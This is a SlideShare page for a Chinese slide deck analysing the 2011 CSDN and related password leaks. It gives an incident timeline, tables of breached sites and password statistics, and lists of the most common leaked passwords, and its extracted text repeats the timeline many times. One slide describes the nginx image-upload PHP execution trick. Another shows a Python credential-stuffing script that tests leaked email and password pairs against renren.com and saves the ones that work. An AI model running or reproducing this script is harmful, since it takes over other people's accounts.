SlideShare ist ein Scribd-Unternehmen logo
1 von 34
Downloaden Sie, um offline zu lesen
.

.
    关注密码泄露事件



      12.31.2011




                                       logo

                   .   .   .   .   .   .

            关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 事件起因:CSDN 密码泄露
  .
  事件经过
  .
    12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知,
    称 CSDN 网站 600 余万用户数据库泄密
      12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐
      户通过木马泄露, 人人网部分泄露
      12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码!
      12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延.
      12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息
      12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料
      12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数
      据!
      12 月 28 日,多所大学数据库信息泄露
  .
                                                     logo

                                 .   .   .   .   .   .

                          关注密码泄露事件
. 密码泄露情况

  CSDN      6,428,632 个帐号   帐号, 明文密码, 电子邮件
  多玩        8,305,005 个帐号   帐号, 加密密码, 部分明文密码等
  178.COM   1,883,487 增加中   帐号, 加密密码, 全部明文密码等
  天涯        4000W+ 账号       帐号, 明文密码, 电子邮件
  人人网       4,768,600 个帐号   明文密码, 电子邮件
  梦幻西游      约 1.4G(木马盗取)    帐号, 邮箱, 明文密码等
  微博        未知个帐号           邮箱, 明文密码
  当当网       10 万用户资料        真实姓名、电子邮件等个人信息
  凡客        20 万用户资料        真实姓名、电子邮件等个人信息
  卓越        20 万用户资料        真实姓名、电子邮件等个人信息
  ···       ·········       ·········


                                                       logo

                                   .   .   .   .   .   .

                            关注密码泄露事件
. 密码泄露原因及猜测
  .
  以 CSDN 为代表的明文保存密码
  .
  2009 年 11 月之前是明文,2009 年 11 月之后是加密的,但部分
  明文密码未清理,2011 年 5 月 12 日清理掉了所有明文密码。所
  以从 2011 年 5 月 12 日开始全部都是安全的,5 月 12 日之前的
  有可能不安全。
  .
  .
  nginx web 服务器漏洞
  .
  对用户开放上传图片权限造成的。黑客可以通过在图片后附加一
  段 PHP 木马脚本上传,然后利用 nginx 的漏洞执行该脚本(然
  后输入/scripts/80sec.jpg/80sec.php 以 php 进行解析)
  .                                          。
  .
  木马
  .
  多
  . 玩网、梦幻西游账户通过木马泄露
  .
  另一个大胆猜测
  .                                                 logo

  众多网站同类后门被发现!
  .                             .   .   .   .   .   .

                         关注密码泄露事件
. 完全密码统计 (摘自网上:最多使用的密码)

  rank   密码          次数          rank   密码             次数
    1    123456      4,138,464    11    123321         183,741
    2    123456789   1,070,028    12    666666         134,599
    3    111111      1,033,040    13    1234567        127,268
    4    123123      471,036      14    111222tianya   116,015
    5    000000      428,307      15    7758521        115,560
    6    12345678    409,722      16    1314520        115,227
    7    wodima123   392,869      17    888888         110,647
    8    5201314     298,458      18    a321654        106,441
    9    a123456     195,049      19    654321         100,137
   10    11111111    186,429      20    woaini         99,977


                                                                 logo

                                           .   .   .    .   .    .

                                 关注密码泄露事件
. CSDN 密码统计 (摘自网上:密码组成)


  .
  按字符类型(数字,小写字母,大写字母,其他符号)
  .
    字符种类数     1         2         3      4
     密码个数 3,667,174 2,512,212 234,712 14,268
  .    比例  57.05%    39.08%    3.65%  0.22%

  .
  按字符长度
  .
    密码长度 1-7 位      8-11 位     12-15 位     16 位及以上
    密码个数 141,264   4,810,335   1,393,025      83,742
  .   比例 2.20%      74.83%      21.67%        1.30%



                                                           logo

                                      .    .   .   .   .   .

                               关注密码泄露事件
. 密码真实性验证(自己动手,丰衣足食)
  for uline in ulines:
  count=count+1
  usps = uline.split()
  email = usps[0]
  password = usps[1]
  myCookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar()
  openner = urllib2.build_opener(myCookie)
  post_data = {'email':email,'password':password,'origURL':'ht
  #post_data = {'username':email,'password':password,'origURL'
  req = urllib2.Request('http://www.renren.com/PLogin.do', url
  html_src = openner.open(req).read()
  if html_src.find(' 没有更多新鲜事了')==-1:
  print count,email,password,"failn"
  else:
  print count,email,password,"success !!!n"
  str_cr=usps[0]+' '+usps[1]+'n'                        logo

  fcrack.write(str_cr)                .   .   .   .   .   .

                              关注密码泄露事件
. 实验结果(自己动手,丰衣足食)




                                         logo

                     .   .   .   .   .   .

              关注密码泄露事件
CSDN 密码类型与平均长度统计(自己动手,丰衣足
. 食)




                                          logo

                      .   .   .   .   .   .

               关注密码泄露事件
CSDN 密码类型与平均长度统计(自己动手,丰衣足
. 食)




                                          logo

                      .   .   .   .   .   .

               关注密码泄露事件
. CSDN 程序猿最喜爱的密码(自己动手,丰衣足食)
  1qaz2wsx     3667
  11223344     4096
  a123456789   4435
  66666666     5025
  1111111111   5145
  aaaaaaaa     5460
  987654321    5553
  147258369    5966
  111111111    6995
  88888888     15033
  1234567890   17791
  123123123    19986
  00000000     34952
  dearbook     46053
  11111111     76346
  12345678     212751
                                                   logo
  123456789    235032
                               .   .   .   .   .   .

                        关注密码泄露事件
. CSDN 邮箱类型统计(自己动手,丰衣足食)




                                          logo

                      .   .   .   .   .   .

               关注密码泄露事件
. CSDN 邮箱类型统计(自己动手,丰衣足食)




                                          logo

                      .   .   .   .   .   .

               关注密码泄露事件
. K7K7 密码长度统计(自己动手,丰衣足食)




                                          logo

                      .   .   .   .   .   .

               关注密码泄露事件
. K7K7 密码长度统计(自己动手,丰衣足食)




                                          logo

                      .   .   .   .   .   .

               关注密码泄露事件
. k7k7 群众最喜欢的密码(自己动手,丰衣足食)
  112233      4844
  woaini      5714
  1234567     6228
  666666      6358
  1314520     6592
  11111111    7860
  7758521     7900
  123321      11080
  123         11527
  12345678    13856
  wangyut2    17016
  5201314     21744
  123123      39173
  123456789   40035
  0           50952
  111111      74182
                                                  logo
  123456      256310
                              .   .   .   .   .   .

                       关注密码泄露事件
. 为什么密码泄露这么严重而广泛?
  .
  CSDN 创始人蒋涛对此发表了评价
  .
     .
    1 某上市公司忙着造假库往外扔,栽赃其他公司,想摆脱被曝

       明文库的证据
     .
    2 有网站通知所有用户改密码,乘机激活用户

      3. 还有网站把这些公开库的数据直接导入自己用户库,也发通
         知给用户改密码
       .
      4 钓鱼的垃圾邮件的都活跃起来了
  .
  .
  肇事者 === 水很深啊
  .
     .
    1 向微博实名制的挑衅

     .
    2 黑客行为,够呛

      3. 安全厂商行为(金山,天涯快压)
       .
      4 蝴蝶效应。
  .                                                     logo

                                    .   .   .   .   .   .

                             关注密码泄露事件
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .
Happy New Year!!!




            .   .   .   .   .   .

Weitere ähnliche Inhalte

Ähnlich wie csdn 密码泄露

《氪月报》2011年12月
《氪月报》2011年12月《氪月报》2011年12月
《氪月报》2011年12月Chada Chiu
 
Qq game后台架构及开发介绍
Qq game后台架构及开发介绍Qq game后台架构及开发介绍
Qq game后台架构及开发介绍mysqlops
 
Security threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonasSecurity threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonasITband
 
Spirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdfSpirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdfssuserdfa916
 
密碼安全與策略 - 2023年當代狀況.pdf
密碼安全與策略 - 2023年當代狀況.pdf密碼安全與策略 - 2023年當代狀況.pdf
密碼安全與策略 - 2023年當代狀況.pdfShoichi Chou
 
HITCON CMT 2017 - ZeroDay 發表會
HITCON CMT 2017 - ZeroDay 發表會HITCON CMT 2017 - ZeroDay 發表會
HITCON CMT 2017 - ZeroDay 發表會Chris Lin
 
20181120 NISRA - 密碼學沒有入門
20181120 NISRA - 密碼學沒有入門20181120 NISRA - 密碼學沒有入門
20181120 NISRA - 密碼學沒有入門Chao An Hsiao
 
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘ChungSC_tw
 
電腦網路 網路安全
電腦網路 網路安全電腦網路 網路安全
電腦網路 網路安全bruce761207
 
Internet Security
Internet SecurityInternet Security
Internet Securitybruce761207
 
資訊證照講座
資訊證照講座資訊證照講座
資訊證照講座Ryan Chung
 

Ähnlich wie csdn 密码泄露 (15)

《氪月报》2011年12月
《氪月报》2011年12月《氪月报》2011年12月
《氪月报》2011年12月
 
機密圖檔與敏感資料庫資料防洩漏方案
機密圖檔與敏感資料庫資料防洩漏方案機密圖檔與敏感資料庫資料防洩漏方案
機密圖檔與敏感資料庫資料防洩漏方案
 
270 隐私云个人版
270 隐私云个人版270 隐私云个人版
270 隐私云个人版
 
Qq game后台架构及开发介绍
Qq game后台架构及开发介绍Qq game后台架构及开发介绍
Qq game后台架构及开发介绍
 
Security threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonasSecurity threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonas
 
Spirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdfSpirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdf
 
密碼安全與策略 - 2023年當代狀況.pdf
密碼安全與策略 - 2023年當代狀況.pdf密碼安全與策略 - 2023年當代狀況.pdf
密碼安全與策略 - 2023年當代狀況.pdf
 
HITCON CMT 2017 - ZeroDay 發表會
HITCON CMT 2017 - ZeroDay 發表會HITCON CMT 2017 - ZeroDay 發表會
HITCON CMT 2017 - ZeroDay 發表會
 
20181120 NISRA - 密碼學沒有入門
20181120 NISRA - 密碼學沒有入門20181120 NISRA - 密碼學沒有入門
20181120 NISRA - 密碼學沒有入門
 
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
 
電腦網路 網路安全
電腦網路 網路安全電腦網路 網路安全
電腦網路 網路安全
 
網路安全
網路安全網路安全
網路安全
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
網路安全
網路安全網路安全
網路安全
 
資訊證照講座
資訊證照講座資訊證照講座
資訊證照講座
 

csdn 密码泄露

  • 1. . . 关注密码泄露事件 12.31.2011 logo . . . . . . 关注密码泄露事件
  • 2. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 3. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 4. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 5. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 6. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 7. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 8. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 9. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  • 10. . 密码泄露情况 CSDN 6,428,632 个帐号 帐号, 明文密码, 电子邮件 多玩 8,305,005 个帐号 帐号, 加密密码, 部分明文密码等 178.COM 1,883,487 增加中 帐号, 加密密码, 全部明文密码等 天涯 4000W+ 账号 帐号, 明文密码, 电子邮件 人人网 4,768,600 个帐号 明文密码, 电子邮件 梦幻西游 约 1.4G(木马盗取) 帐号, 邮箱, 明文密码等 微博 未知个帐号 邮箱, 明文密码 当当网 10 万用户资料 真实姓名、电子邮件等个人信息 凡客 20 万用户资料 真实姓名、电子邮件等个人信息 卓越 20 万用户资料 真实姓名、电子邮件等个人信息 ··· ········· ········· logo . . . . . . 关注密码泄露事件
  • 11. . 密码泄露原因及猜测 . 以 CSDN 为代表的明文保存密码 . 2009 年 11 月之前是明文,2009 年 11 月之后是加密的,但部分 明文密码未清理,2011 年 5 月 12 日清理掉了所有明文密码。所 以从 2011 年 5 月 12 日开始全部都是安全的,5 月 12 日之前的 有可能不安全。 . . nginx web 服务器漏洞 . 对用户开放上传图片权限造成的。黑客可以通过在图片后附加一 段 PHP 木马脚本上传,然后利用 nginx 的漏洞执行该脚本(然 后输入/scripts/80sec.jpg/80sec.php 以 php 进行解析) . 。 . 木马 . 多 . 玩网、梦幻西游账户通过木马泄露 . 另一个大胆猜测 . logo 众多网站同类后门被发现! . . . . . . . 关注密码泄露事件
  • 12. . 完全密码统计 (摘自网上:最多使用的密码) rank 密码 次数 rank 密码 次数 1 123456 4,138,464 11 123321 183,741 2 123456789 1,070,028 12 666666 134,599 3 111111 1,033,040 13 1234567 127,268 4 123123 471,036 14 111222tianya 116,015 5 000000 428,307 15 7758521 115,560 6 12345678 409,722 16 1314520 115,227 7 wodima123 392,869 17 888888 110,647 8 5201314 298,458 18 a321654 106,441 9 a123456 195,049 19 654321 100,137 10 11111111 186,429 20 woaini 99,977 logo . . . . . . 关注密码泄露事件
  • 13. . CSDN 密码统计 (摘自网上:密码组成) . 按字符类型(数字,小写字母,大写字母,其他符号) . 字符种类数 1 2 3 4 密码个数 3,667,174 2,512,212 234,712 14,268 . 比例 57.05% 39.08% 3.65% 0.22% . 按字符长度 . 密码长度 1-7 位 8-11 位 12-15 位 16 位及以上 密码个数 141,264 4,810,335 1,393,025 83,742 . 比例 2.20% 74.83% 21.67% 1.30% logo . . . . . . 关注密码泄露事件
  • 14. . 密码真实性验证(自己动手,丰衣足食) for uline in ulines: count=count+1 usps = uline.split() email = usps[0] password = usps[1] myCookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar() openner = urllib2.build_opener(myCookie) post_data = {'email':email,'password':password,'origURL':'ht #post_data = {'username':email,'password':password,'origURL' req = urllib2.Request('http://www.renren.com/PLogin.do', url html_src = openner.open(req).read() if html_src.find(' 没有更多新鲜事了')==-1: print count,email,password,"failn" else: print count,email,password,"success !!!n" str_cr=usps[0]+' '+usps[1]+'n' logo fcrack.write(str_cr) . . . . . . 关注密码泄露事件
  • 15. . 实验结果(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  • 18. . CSDN 程序猿最喜爱的密码(自己动手,丰衣足食) 1qaz2wsx 3667 11223344 4096 a123456789 4435 66666666 5025 1111111111 5145 aaaaaaaa 5460 987654321 5553 147258369 5966 111111111 6995 88888888 15033 1234567890 17791 123123123 19986 00000000 34952 dearbook 46053 11111111 76346 12345678 212751 logo 123456789 235032 . . . . . . 关注密码泄露事件
  • 19. . CSDN 邮箱类型统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  • 20. . CSDN 邮箱类型统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  • 21. . K7K7 密码长度统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  • 22. . K7K7 密码长度统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  • 23. . k7k7 群众最喜欢的密码(自己动手,丰衣足食) 112233 4844 woaini 5714 1234567 6228 666666 6358 1314520 6592 11111111 7860 7758521 7900 123321 11080 123 11527 12345678 13856 wangyut2 17016 5201314 21744 123123 39173 123456789 40035 0 50952 111111 74182 logo 123456 256310 . . . . . . 关注密码泄露事件
  • 24. . 为什么密码泄露这么严重而广泛? . CSDN 创始人蒋涛对此发表了评价 . . 1 某上市公司忙着造假库往外扔,栽赃其他公司,想摆脱被曝 明文库的证据 . 2 有网站通知所有用户改密码,乘机激活用户 3. 还有网站把这些公开库的数据直接导入自己用户库,也发通 知给用户改密码 . 4 钓鱼的垃圾邮件的都活跃起来了 . . 肇事者 === 水很深啊 . . 1 向微博实名制的挑衅 . 2 黑客行为,够呛 3. 安全厂商行为(金山,天涯快压) . 4 蝴蝶效应。 . logo . . . . . . 关注密码泄露事件
  • 25. Happy New Year!!! . . . . . .
  • 26. Happy New Year!!! . . . . . .
  • 27. Happy New Year!!! . . . . . .
  • 28. Happy New Year!!! . . . . . .
  • 29. Happy New Year!!! . . . . . .
  • 30. Happy New Year!!! . . . . . .
  • 31. Happy New Year!!! . . . . . .
  • 32. Happy New Year!!! . . . . . .
  • 33. Happy New Year!!! . . . . . .
  • 34. Happy New Year!!! . . . . . .